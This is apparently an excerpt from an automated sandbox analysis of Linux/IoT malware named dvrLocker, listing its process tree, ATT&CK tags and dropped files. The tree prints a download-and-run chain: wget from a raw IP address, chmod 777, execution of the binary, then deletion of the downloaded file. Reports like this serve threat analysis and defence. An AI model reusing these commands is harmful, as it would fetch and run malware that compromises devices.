                                                                                                                                                                                                                                                                                                    wget http://45.125.66.90/arm6 -O -
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:1768
                                                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                                                      chmod 777 dvrLocker
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                      PID:1769
                                                                                                                                                                                                                                                                                                    • /mnt/dvrLocker
                                                                                                                                                                                                                                                                                                      ./dvrLocker tplink.new
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:1770
                                                                                                                                                                                                                                                                                                    • /bin/rm
                                                                                                                                                                                                                                                                                                      rm -rf arm6
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1772

                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                    • /mnt/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      102KB

                                                                                                                                                                                                                                                                                                    • /tmp/lib/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                    • /tmp/lib/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      99KB

                                                                                                                                                                                                                                                                                                    • /tmp/lib/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      77KB

                                                                                                                                                                                                                                                                                                    • /tmp/lib/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      73KB

                                                                                                                                                                                                                                                                                                    • /tmp/lib/dvrLocker

                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      75KB

• /tmp/lib/dvrLocker

  Filesize: 102KB
